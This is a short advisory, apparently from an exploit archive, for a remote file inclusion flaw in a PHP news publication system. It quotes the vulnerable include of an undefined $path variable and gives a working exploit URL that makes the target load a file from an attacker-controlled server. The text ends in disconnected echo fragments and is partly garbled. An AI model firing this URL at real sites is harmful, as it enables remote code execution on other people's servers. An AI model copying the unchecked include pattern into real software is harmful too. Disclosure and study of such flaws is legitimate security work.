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News publication system remote File include
News publication system remote File include
News publication system remote File include

Software: News publication system
Description: News publication system provides a mechanism for news blocks publication on site in conformity with rules and templates set. Provides a mechanism for adding news to the system and news management. Provides a mechanism for system management functions access control.
Site: http://sourceforge.net/project/showfiles.php?group_id=27445 

The variable $path in class.Database.php isn't defined before it is included.  Register_Globals must be on.

Vulnerable Code:

if ($path!="")
  include $path."config.inc";
include "../config.inc";
http://[SITE]/newsp/lib/class.Database.php?path=http://[your server]/jacked.txt? 

echo 'handle failed';
echo $data;

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